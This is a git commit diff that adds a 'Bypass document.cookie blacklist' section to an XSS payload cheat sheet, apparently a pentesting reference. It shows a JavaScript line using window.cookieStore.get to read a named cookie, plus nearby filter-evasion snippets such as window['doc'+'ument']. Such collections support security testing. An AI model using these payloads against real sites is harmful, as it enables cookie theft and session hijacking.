Merge pull request #575 from CoryCline/patch-1

Added document.cookie blacklist bypass
2025-01-18 17:28:49 +00:00 · 2022-10-14 09:57:41 +02:00 · 2022-10-14 09:57:41 +02:00 · a794c57994
commit a794c57994
parent 6479c3a400 a8d8434756
1 changed files with 9 additions and 0 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
    - [Bypass space filter](#bypass-space-filter)
    - [Bypass email filter](#bypass-email-filter)
    - [Bypass document blacklist](#bypass-document-blacklist)
+    - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist)
    - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
    - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
    - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
@ -774,6 +775,14 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 window["doc"+"ument"]
 ```

+### Bypass document.cookie blacklist
+
+This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
+
+```
+window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
+```
+
 ### Bypass using javascript inside a string

 ```javascript